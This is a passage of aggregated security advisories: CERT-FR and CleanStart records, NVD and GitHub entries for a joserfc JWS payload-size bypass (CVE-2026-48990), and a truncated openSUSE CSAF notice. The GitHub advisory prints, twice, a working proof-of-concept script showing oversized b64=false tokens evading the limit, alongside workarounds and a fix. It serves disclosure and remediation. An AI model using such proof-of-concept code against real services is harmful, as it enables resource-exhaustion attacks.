"url": "https://www.cve.org/CVERecord?id=CVE-2026-2004"
},
{
"name": "CVE-2026-9071",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-9071"
},
{
"name": "CVE-2026-35554",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-35554"
},
{
"name": "CVE-2026-34993",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-34993"
},
{
"name": "CVE-2026-27727",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-27727"
},
{
"name": "CVE-2026-10852",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-10852"
},
{
"name": "CVE-2025-12183",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-12183"
},
{
"name": "CVE-2026-41848",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-41848"
},
{
"name": "CVE-2025-14813",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-14813"
},
{
"name": "CVE-2026-48156",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-48156"
},
{
"name": "CVE-2026-24281",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-24281"
},
{
"name": "CVE-2026-34077",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-34077"
},
{
"name": "CVE-2026-53539",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-53539"
},
{
"name": "CVE-2025-11226",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-11226"
}
],
"initial_release_date": "2026-07-24T00:00:00",
"last_revision_date": "2026-07-24T00:00:00",
"links": [],
"reference": "CERTFR-2026-AVI-0933",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2026-07-24T00:00:00.000000"
}
],
"risks": [
{
"description": "D\u00e9ni de service \u00e0 distance"
},
{
"description": "Injection de code indirecte \u00e0 distance (XSS)"
},
{
"description": "Ex\u00e9cution de code arbitraire \u00e0 distance"
},
{
"description": "Atteinte \u00e0 l\u0027int\u00e9grit\u00e9 des donn\u00e9es"
},
{
"description": "Non sp\u00e9cifi\u00e9 par l\u0027\u00e9diteur"
},
{
"description": "Falsification de requ\u00eates c\u00f4t\u00e9 serveur (SSRF)"
},
{
"description": "Contournement de la politique de s\u00e9curit\u00e9"
},
{
"description": "Atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es"
},
{
"description": "\u00c9l\u00e9vation de privil\u00e8ges"
}
],
"summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans les produits IBM. Certaines d\u0027entre elles permettent \u00e0 un attaquant de provoquer une ex\u00e9cution de code arbitraire \u00e0 distance, une \u00e9l\u00e9vation de privil\u00e8ges et un d\u00e9ni de service \u00e0 distance.",
"title": "Multiples vuln\u00e9rabilit\u00e9s dans les produits IBM",
"vendor_advisories": [
{
"published_at": "2026-07-22",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7280728",
"url": "https://www.ibm.com/support/pages/node/7280728"
},
{
"published_at": "2026-07-22",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7280784",
"url": "https://www.ibm.com/support/pages/node/7280784"
},
{
"published_at": "2026-07-21",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7280667",
"url": "https://www.ibm.com/support/pages/node/7280667"
},
{
"published_at": "2026-07-21",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7280663",
"url": "https://www.ibm.com/support/pages/node/7280663"
},
{
"published_at": "2026-07-23",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7280907",
"url": "https://www.ibm.com/support/pages/node/7280907"
},
{
"published_at": "2026-07-22",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7280731",
"url": "https://www.ibm.com/support/pages/node/7280731"
},
{
"published_at": "2026-07-22",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7280720",
"url": "https://www.ibm.com/support/pages/node/7280720"
},
{
"published_at": "2026-07-24",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7281073",
"url": "https://www.ibm.com/support/pages/node/7281073"
},
{
"published_at": "2026-07-20",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7280519",
"url": "https://www.ibm.com/support/pages/node/7280519"
},
{
"published_at": "2026-07-20",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7280540",
"url": "https://www.ibm.com/support/pages/node/7280540"
},
{
"published_at": "2026-07-22",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7280730",
"url": "https://www.ibm.com/support/pages/node/7280730"
},
{
"published_at": "2026-07-22",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7280726",
"url": "https://www.ibm.com/support/pages/node/7280726"
},
{
"published_at": "2026-07-22",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7280783",
"url": "https://www.ibm.com/support/pages/node/7280783"
},
{
"published_at": "2026-07-21",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7280650",
"url": "https://www.ibm.com/support/pages/node/7280650"
},
{
"published_at": "2026-07-21",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7280654",
"url": "https://www.ibm.com/support/pages/node/7280654"
},
{
"published_at": "2026-07-21",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7280644",
"url": "https://www.ibm.com/support/pages/node/7280644"
},
{
"published_at": "2026-07-22",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7280729",
"url": "https://www.ibm.com/support/pages/node/7280729"
},
{
"published_at": "2026-07-22",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7280785",
"url": "https://www.ibm.com/support/pages/node/7280785"
},
{
"published_at": "2026-07-21",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7280695",
"url": "https://www.ibm.com/support/pages/node/7280695"
},
{
"published_at": "2026-07-22",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7280719",
"url": "https://www.ibm.com/support/pages/node/7280719"
},
{
"published_at": "2026-07-22",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7280727",
"url": "https://www.ibm.com/support/pages/node/7280727"
},
{
"published_at": "2026-07-21",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7280646",
"url": "https://www.ibm.com/support/pages/node/7280646"
},
{
"published_at": "2026-07-22",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7280670",
"url": "https://www.ibm.com/support/pages/node/7280670"
},
{
"published_at": "2026-07-23",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7280916",
"url": "https://www.ibm.com/support/pages/node/7280916"
},
{
"published_at": "2026-07-23",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7280950",
"url": "https://www.ibm.com/support/pages/node/7280950"
},
{
"published_at": "2026-07-21",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7280126",
"url": "https://www.ibm.com/support/pages/node/7280126"
},
{
"published_at": "2026-07-21",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7280656",
"url": "https://www.ibm.com/support/pages/node/7280656"
},
{
"published_at": "2026-07-22",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7280621",
"url": "https://www.ibm.com/support/pages/node/7280621"
},
{
"published_at": "2026-07-23",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7280887",
"url": "https://www.ibm.com/support/pages/node/7280887"
}
]
}
cleanstart-2026-iu24971
Vulnerability from cleanstart
Package airflow-3 version 3.2.2-r1 fixes 16 vulnerabilities: CVE-2026-59885, CVE-2026-59886, CVE-2026-59884, CVE-2026-59939, CVE-2026-54590...
| URL | Type | |
|---|---|---|
{
"affected": [
{
"package": {
"ecosystem": "Alpine",
"name": "airflow-3"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.2.2-r1"
}
],
"type": "ECOSYSTEM"
}
],
"versions": [
"3.2.2-r1"
]
}
],
"credits": [],
"database_specific": {},
"details": "Package airflow-3 version 3.2.2-r1 fixes 16 vulnerabilities: CVE-2026-59885, CVE-2026-59886, CVE-2026-59884, CVE-2026-59939, CVE-2026-54590...",
"id": "CLEANSTART-2026-IU24971",
"modified": "2026-07-30T09:30:28Z",
"published": "2026-07-30T07:10:53Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/apache/airflow"
}
],
"related": [],
"schema_version": "1.7.3",
"summary": "Security fixes in airflow-3 3.2.2-r1",
"upstream": [
"CVE-2026-59885",
"CVE-2026-59886",
"CVE-2026-59884",
"CVE-2026-59939",
"CVE-2026-54590",
"CVE-2026-54591",
"CVE-2026-58203",
"CVE-2026-59884",
"CVE-2026-49477",
"ghsa-4xgf-cpjx-pc3j",
"CVE-2026-59890",
"CVE-2026-44405",
"ghsa-6v7p-g79w-8964",
"CVE-2026-48990",
"CVE-2026-49852",
"CVE-2026-53533"
]
}
FKIE_CVE-2026-48990
Vulnerability from fkie_nvd - Published: 2026-06-17 22:16 - Updated: 2026-06-23 15:50| URL | Tags | ||
|---|---|---|---|
| security-advisories@github.com | https://github.com/authlib/joserfc/releases/tag/1.6.7 | ||
| security-advisories@github.com | https://github.com/authlib/joserfc/security/advisories/GHSA-wphv-vfrh-23q5 | ||
| 134c704f-9b21-4f2e-91b3-4a467353bcc0 | https://github.com/authlib/joserfc/security/advisories/GHSA-wphv-vfrh-23q5 |
| Vendor | Product | Version |
|---|
{
"affected": [
{
"affectedData": [
{
"product": "joserfc",
"vendor": "authlib",
"versions": [
{
"status": "affected",
"version": "\u003c 1.6.7"
}
]
}
],
"source": "security-advisories@github.com"
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "joserfc is a Python library that provides an implementation of several JSON Object Signing and Encryption (JOSE) standards. In versions 1.3.4 through 1.6.5, joserfc accepts oversized RFC7797 b64=false JWS payloads without applying JWSRegistry.max_payload_length, which can lead to resource exhaustion. The normal JWS compact and flattened JSON paths reject payloads above the configured payload-size limit with ExceededSizeError. The RFC7797 unencoded payload paths do not make the same check. A valid b64=false compact or flattened JSON JWS can therefore deserialize successfully with a payload larger than JWSRegistry.max_payload_length. Applications that accept lower-trust JWS values and rely on joserfc to reject oversized token content during verification have a moderate availability risk. This issue has been fixed in version 1.6.7."
}
],
"id": "CVE-2026-48990",
"lastModified": "2026-06-23T15:50:59.400",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 1.4,
"source": "security-advisories@github.com",
"type": "Secondary"
}
],
"ssvcV203": [
{
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"ssvcData": {
"id": "CVE-2026-48990",
"options": [
{
"exploitation": "poc"
},
{
"automatable": "yes"
},
{
"technicalImpact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-06-18T12:51:44.745917Z",
"version": "2.0.3"
}
}
]
},
"published": "2026-06-17T22:16:23.270",
"references": [
{
"source": "security-advisories@github.com",
"url": "https://github.com/authlib/joserfc/releases/tag/1.6.7"
},
{
"source": "security-advisories@github.com",
"url": "https://github.com/authlib/joserfc/security/advisories/GHSA-wphv-vfrh-23q5"
},
{
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"url": "https://github.com/authlib/joserfc/security/advisories/GHSA-wphv-vfrh-23q5"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Deferred",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-400"
},
{
"lang": "en",
"value": "CWE-770"
}
],
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
}
GHSA-WPHV-VFRH-23Q5
Vulnerability from github – Published: 2026-06-26 20:59 – Updated: 2026-06-26 20:59RFC7797 b64=false JWS payloads bypass JWSRegistry payload-size limits during deserialization
Summary
Testing revealed that joserfc accepts oversized RFC7797 b64=false JWS payloads without applying JWSRegistry.max_payload_length.
The normal JWS compact and flattened JSON paths reject payloads above the configured payload-size limit with ExceededSizeError. The RFC7797 unencoded payload paths do not make the same check. A valid b64=false compact or flattened JSON JWS can therefore deserialize successfully with a payload larger than JWSRegistry.max_payload_length.
This creates a moderate availability/resource-exhaustion risk for applications that accept lower-trust JWS values and rely on joserfc to reject oversized token content during verification.
Affected Product
- Package:
joserfc - Ecosystem:
pip - Audited release:
1.6.5 - Audit tag:
1.6.5 - Audit commit:
881712980934fb601bed26fe3ae1ec0b7780e6f7 - Tested affected releases:
1.3.4,1.3.5,1.4.2,1.6.2,1.6.3,1.6.4,1.6.5 - Fixed release: none known
Vulnerability Details
In joserfc 1.6.5, the default JWS registry has max_payload_length = 128000 and exposes validate_payload_size().
The normal compact extraction path calls that check before base64url-decoding the payload. The RFC7797 compact path validates the header and signature segment sizes, then assigns the unencoded payload directly:
if is_rfc7797_enabled(protected):
if not payload_segment and payload:
payload_segment = to_bytes(payload)
payload = payload_segment
The flattened JSON RFC7797 path has the same pattern:
payload_segment = value["payload"].encode("utf-8")
if is_rfc7797_enabled(member.headers()):
payload = payload_segment
Neither branch calls registry.validate_payload_size(payload_segment) before accepting the unencoded payload.
Reproduction
The proof below uses only local Python APIs. It signs a payload one byte over the default limit and then compares normal JWS behavior with RFC7797 b64=false behavior.
Requirements:
python -m pip install "joserfc==1.6.5"
Run:
python joserfc_rfc7797_size_bypass_poc.py
Self-contained proof script:
#!/usr/bin/env python3
import json
import joserfc
from joserfc import jws
from joserfc.jwk import OctKey
def check_compact(name, header, payload, key):
token = jws.serialize_compact(header, payload, key)
try:
obj = jws.deserialize_compact(token, key)
return {
"case": name,
"accepted": True,
"exception": None,
"payload_len_after_deserialize": len(obj.payload),
}
except Exception as exc:
return {
"case": name,
"accepted": False,
"exception": type(exc).__name__,
"error": str(exc),
}
def check_json(name, protected, payload, key):
data = jws.serialize_json({"protected": protected}, payload, key)
try:
obj = jws.deserialize_json(data, key)
return {
"case": name,
"accepted": True,
"exception": None,
"payload_len_after_deserialize": len(obj.payload),
}
except Exception as exc:
return {
"case": name,
"accepted": False,
"exception": type(exc).__name__,
"error": str(exc),
}
key = OctKey.import_key("secret-secret-secret")
limit = jws.default_registry.max_payload_length
payload = "A" * (limit + 1)
results = {
"joserfc_version": joserfc.__version__,
"default_max_payload_length": limit,
"payload_len": len(payload),
"compact": [
check_compact("normal_b64_true", {"alg": "HS256"}, payload, key),
check_compact(
"rfc7797_b64_false",
{"alg": "HS256", "b64": False, "crit": ["b64"]},
payload,
key,
),
],
"json": [
check_json("normal_b64_true_json", {"alg": "HS256"}, payload, key),
check_json(
"rfc7797_b64_false_json",
{"alg": "HS256", "b64": False, "crit": ["b64"]},
payload,
key,
),
],
}
print(json.dumps(results, indent=2, sort_keys=True))
Expected output on 1.6.5 includes:
{
"default_max_payload_length": 128000,
"payload_len": 128001,
"compact": [
{
"case": "normal_b64_true",
"accepted": false,
"exception": "ExceededSizeError"
},
{
"case": "rfc7797_b64_false",
"accepted": true,
"exception": null,
"payload_len_after_deserialize": 128001
}
],
"json": [
{
"case": "normal_b64_true_json",
"accepted": false,
"exception": "ExceededSizeError"
},
{
"case": "rfc7797_b64_false_json",
"accepted": true,
"exception": null,
"payload_len_after_deserialize": 128001
}
]
}
Version Checks
I reproduced the same differential behavior on these releases:
| Version | Normal JWS over limit | RFC7797 b64=false over limit |
|---|---|---|
| 1.3.4 | ExceededSizeError |
accepted |
| 1.3.5 | ExceededSizeError |
accepted |
| 1.4.2 | ExceededSizeError |
accepted |
| 1.6.2 | ExceededSizeError |
accepted |
| 1.6.3 | ExceededSizeError |
accepted |
| 1.6.4 | ExceededSizeError |
accepted |
| 1.6.5 | ExceededSizeError |
accepted |
The exact earliest affected release may be broader. The versions above are the releases I directly tested where the JWS size-limit boundary exists and the RFC7797 path bypasses it.
Relationship to Existing Advisories
I found two related public advisories for joserfc, but neither appears to cover this root cause.
GHSA-frfh-8v73-gjg4 / CVE-2025-65015 describes oversized token parts being included in ExceededSizeError messages in older release ranges. The issue described here reproduces in 1.6.5 and is not about exception message content. The oversized RFC7797 payload is accepted instead of raising ExceededSizeError.
GHSA-w5r5-m38g-f9f9 / CVE-2026-27932 describes unbounded PBES2 p2c iteration counts during JWE decryption. The issue described here is in JWS RFC7797 payload extraction and does not involve PBES2 or JWE decryption.
Workarounds
Before a fixed release is available, affected applications can reduce exposure by rejecting oversized serialized JWS inputs before passing them to joserfc, disabling or disallowing RFC7797 b64=false tokens if not needed, and enforcing strict request/header/body size limits at the application or reverse-proxy layer.
Suggested Remediation
Apply registry.validate_payload_size(payload_segment) to RFC7797 unencoded payloads before assigning them to the JWS object in both compact and flattened JSON extraction paths. Detached RFC7797 compact payloads supplied through the payload argument should be checked in the same way.
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "joserfc"
},
"ranges": [
{
"events": [
{
"introduced": "1.3.4"
},
{
"fixed": "1.6.7"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-48990"
],
"database_specific": {
"cwe_ids": [
"CWE-400",
"CWE-770"
],
"github_reviewed": true,
"github_reviewed_at": "2026-06-26T20:59:38Z",
"nvd_published_at": "2026-06-17T22:16:23Z",
"severity": "MODERATE"
},
"details": "# RFC7797 b64=false JWS payloads bypass JWSRegistry payload-size limits during deserialization\n\n## Summary\n\nTesting revealed that `joserfc` accepts oversized RFC7797 `b64=false` JWS payloads without applying `JWSRegistry.max_payload_length`.\n\nThe normal JWS compact and flattened JSON paths reject payloads above the configured payload-size limit with `ExceededSizeError`. The RFC7797 unencoded payload paths do not make the same check. A valid `b64=false` compact or flattened JSON JWS can therefore deserialize successfully with a payload larger than `JWSRegistry.max_payload_length`.\n\nThis creates a moderate availability/resource-exhaustion risk for applications that accept lower-trust JWS values and rely on `joserfc` to reject oversized token content during verification.\n\n## Affected Product\n\n- Package: `joserfc`\n- Ecosystem: `pip`\n- Audited release: `1.6.5`\n- Audit tag: `1.6.5`\n- Audit commit: `881712980934fb601bed26fe3ae1ec0b7780e6f7`\n- Tested affected releases: `1.3.4`, `1.3.5`, `1.4.2`, `1.6.2`, `1.6.3`, `1.6.4`, `1.6.5`\n- Fixed release: none known\n\n## Vulnerability Details\n\nIn `joserfc` 1.6.5, the default JWS registry has `max_payload_length = 128000` and exposes `validate_payload_size()`.\n\nThe normal compact extraction path calls that check before base64url-decoding the payload. The RFC7797 compact path validates the header and signature segment sizes, then assigns the unencoded payload directly:\n\n```text\nif is_rfc7797_enabled(protected):\n if not payload_segment and payload:\n payload_segment = to_bytes(payload)\n payload = payload_segment\n```\n\nThe flattened JSON RFC7797 path has the same pattern:\n\n```text\npayload_segment = value[\"payload\"].encode(\"utf-8\")\nif is_rfc7797_enabled(member.headers()):\n payload = payload_segment\n```\n\nNeither branch calls `registry.validate_payload_size(payload_segment)` before accepting the unencoded payload.\n\n## Reproduction\n\nThe proof below uses only local Python APIs. It signs a payload one byte over the default limit and then compares normal JWS behavior with RFC7797 `b64=false` behavior.\n\nRequirements:\n\n```bash\npython -m pip install \"joserfc==1.6.5\"\n```\n\nRun:\n\n```bash\npython joserfc_rfc7797_size_bypass_poc.py\n```\n\nSelf-contained proof script:\n\n```python\n#!/usr/bin/env python3\nimport json\n\nimport joserfc\nfrom joserfc import jws\nfrom joserfc.jwk import OctKey\n\n\ndef check_compact(name, header, payload, key):\n token = jws.serialize_compact(header, payload, key)\n try:\n obj = jws.deserialize_compact(token, key)\n return {\n \"case\": name,\n \"accepted\": True,\n \"exception\": None,\n \"payload_len_after_deserialize\": len(obj.payload),\n }\n except Exception as exc:\n return {\n \"case\": name,\n \"accepted\": False,\n \"exception\": type(exc).__name__,\n \"error\": str(exc),\n }\n\n\ndef check_json(name, protected, payload, key):\n data = jws.serialize_json({\"protected\": protected}, payload, key)\n try:\n obj = jws.deserialize_json(data, key)\n return {\n \"case\": name,\n \"accepted\": True,\n \"exception\": None,\n \"payload_len_after_deserialize\": len(obj.payload),\n }\n except Exception as exc:\n return {\n \"case\": name,\n \"accepted\": False,\n \"exception\": type(exc).__name__,\n \"error\": str(exc),\n }\n\n\nkey = OctKey.import_key(\"secret-secret-secret\")\nlimit = jws.default_registry.max_payload_length\npayload = \"A\" * (limit + 1)\n\nresults = {\n \"joserfc_version\": joserfc.__version__,\n \"default_max_payload_length\": limit,\n \"payload_len\": len(payload),\n \"compact\": [\n check_compact(\"normal_b64_true\", {\"alg\": \"HS256\"}, payload, key),\n check_compact(\n \"rfc7797_b64_false\",\n {\"alg\": \"HS256\", \"b64\": False, \"crit\": [\"b64\"]},\n payload,\n key,\n ),\n ],\n \"json\": [\n check_json(\"normal_b64_true_json\", {\"alg\": \"HS256\"}, payload, key),\n check_json(\n \"rfc7797_b64_false_json\",\n {\"alg\": \"HS256\", \"b64\": False, \"crit\": [\"b64\"]},\n payload,\n key,\n ),\n ],\n}\nprint(json.dumps(results, indent=2, sort_keys=True))\n```\n\nExpected output on `1.6.5` includes:\n\n```json\n{\n \"default_max_payload_length\": 128000,\n \"payload_len\": 128001,\n \"compact\": [\n {\n \"case\": \"normal_b64_true\",\n \"accepted\": false,\n \"exception\": \"ExceededSizeError\"\n },\n {\n \"case\": \"rfc7797_b64_false\",\n \"accepted\": true,\n \"exception\": null,\n \"payload_len_after_deserialize\": 128001\n }\n ],\n \"json\": [\n {\n \"case\": \"normal_b64_true_json\",\n \"accepted\": false,\n \"exception\": \"ExceededSizeError\"\n },\n {\n \"case\": \"rfc7797_b64_false_json\",\n \"accepted\": true,\n \"exception\": null,\n \"payload_len_after_deserialize\": 128001\n }\n ]\n}\n```\n\n## Version Checks\n\nI reproduced the same differential behavior on these releases:\n\n| Version | Normal JWS over limit | RFC7797 `b64=false` over limit |\n| --- | --- | --- |\n| 1.3.4 | `ExceededSizeError` | accepted |\n| 1.3.5 | `ExceededSizeError` | accepted |\n| 1.4.2 | `ExceededSizeError` | accepted |\n| 1.6.2 | `ExceededSizeError` | accepted |\n| 1.6.3 | `ExceededSizeError` | accepted |\n| 1.6.4 | `ExceededSizeError` | accepted |\n| 1.6.5 | `ExceededSizeError` | accepted |\n\nThe exact earliest affected release may be broader. The versions above are the releases I directly tested where the JWS size-limit boundary exists and the RFC7797 path bypasses it.\n\n## Relationship to Existing Advisories\n\nI found two related public advisories for `joserfc`, but neither appears to cover this root cause.\n\n`GHSA-frfh-8v73-gjg4` / `CVE-2025-65015` describes oversized token parts being included in `ExceededSizeError` messages in older release ranges. The issue described here reproduces in `1.6.5` and is not about exception message content. The oversized RFC7797 payload is accepted instead of raising `ExceededSizeError`.\n\n`GHSA-w5r5-m38g-f9f9` / `CVE-2026-27932` describes unbounded PBES2 `p2c` iteration counts during JWE decryption. The issue described here is in JWS RFC7797 payload extraction and does not involve PBES2 or JWE decryption.\n\n## Workarounds\n\nBefore a fixed release is available, affected applications can reduce exposure by rejecting oversized serialized JWS inputs before passing them to `joserfc`, disabling or disallowing RFC7797 `b64=false` tokens if not needed, and enforcing strict request/header/body size limits at the application or reverse-proxy layer.\n\n## Suggested Remediation\n\nApply `registry.validate_payload_size(payload_segment)` to RFC7797 unencoded payloads before assigning them to the JWS object in both compact and flattened JSON extraction paths. Detached RFC7797 compact payloads supplied through the `payload` argument should be checked in the same way.",
"id": "GHSA-wphv-vfrh-23q5",
"modified": "2026-06-26T20:59:38Z",
"published": "2026-06-26T20:59:38Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/authlib/joserfc/security/advisories/GHSA-wphv-vfrh-23q5"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-48990"
},
{
"type": "PACKAGE",
"url": "https://github.com/authlib/joserfc"
},
{
"type": "WEB",
"url": "https://github.com/authlib/joserfc/releases/tag/1.6.7"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"type": "CVSS_V3"
}
],
"summary": "joserfc: b64=false RFC7797 JWS payloads bypass JWSRegistry payload-size limits during deserialization"
}
OPENSUSE-SU-2026:11067-1
Vulnerability from csaf_opensuse - Published: 2026-06-19 00:00 - Updated: 2026-06-19 00:00| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:python311-joserfc-1.7.1-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-joserfc-1.7.1-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-joserfc-1.7.1-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-joserfc-1.7.1-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-joserfc-1.7.1-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-joserfc-1.7.1-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-joserfc-1.7.1-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-joserfc-1.7.1-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-joserfc-1.7.1-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-joserfc-1.7.1-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-joserfc-1.7.1-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-joserfc-1.7.1-1.1.x86_64 | — |
Vendor Fix
|
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "moderate"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "python311-joserfc-1.7.1-1.1 on GA media",
"title": "Title of the patch"
},
{
"category": "description",
"text": "These are all security issues fixed in the python311-joserfc-1.7.1-1.1 package on the GA media of openSUSE Tumbleweed.",
"title": "Description of the patch"
},
{
"category": "details",
"text": "openSUSE-Tumbleweed-2026-11067",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2026_11067-1.json"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-48990 page",
"url": "https://www.suse.com/security/cve/CVE-2026-48990/"
}
],
"title": "python311-joserfc-1.7.1-1.1 on GA media",
"tracking": {
"current_release_date": "2026-06-19T00:00:00Z",
"generator": {
"date": "2026-06-19T00:00:00Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "openSUSE-SU-2026:11067-1",
"initial_release_date": "2026-06-19T00:00:00Z",
"revision_history": [
{
"date": "2026-06-19T00:00:00Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "python311-joserfc-1.7.1-1.1.aarch64",
"product": {
"name": "python311-joserfc-1.7.1-1.1.aarch64",
"product_id": "python311-joserfc-1.7.1-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "python313-joserfc-1.7.1-1.1.aarch64",
"product": {
"name": "python313-joserfc-1.7.1-1.1.aarch64",
"product_id": "python313-joserfc-1.7.1-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "python314-joserfc-1.7.1-1.1.aarch64",
"product": {
"name": "python314-joserfc-1.7.1-1.1.aarch64",
"product_id": "python314-joserfc-1.7.1-1.1.aarch64"
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "python311-joserfc-1.7.1-1.1.ppc64le",
"product": {
"name": "python311-joserfc-1.7.1-1.1.ppc64le",
"product_id": "python311-joserfc-1.7.1-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "python313-joserfc-1.7.1-1.1.ppc64le",
"product": {
"name": "python313-joserfc-1.7.1-1.1.ppc64le",
"product_id": "python313-joserfc-1.7.1-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "python314-joserfc-1.7.1-1.1.ppc64le",
"product": {
"name": "python314-joserfc-1.7.1-1.1.ppc64le",
"product_id": "python314-joserfc-1.7.1-1.1.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "python311-joserfc-1.7.1-1.1.s390x",
"product": {
"name": "python311-joserfc-1.7.1-1.1.s390x",
"product_id": "python311-joserfc-1.7.1-1.1.s390x"
}
},
{
"category": "product_version",
"name": "python313-joserfc-1.7.1-1.1.s390x",
"product": {
"name": "python313-joserfc-1.7.1-1.1.s390x",
"product_id": "python313-joserfc-1.7.1-1.1.s390x"
}
},
{
"category": "product_version",
"name": "python314-joserfc-1.7.1-1.1.s390x",
"product": {
"name": "python314-joserfc-1.7.1-1.1.s390x",
"product_id": "python314-joserfc-1.7.1-1.1.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
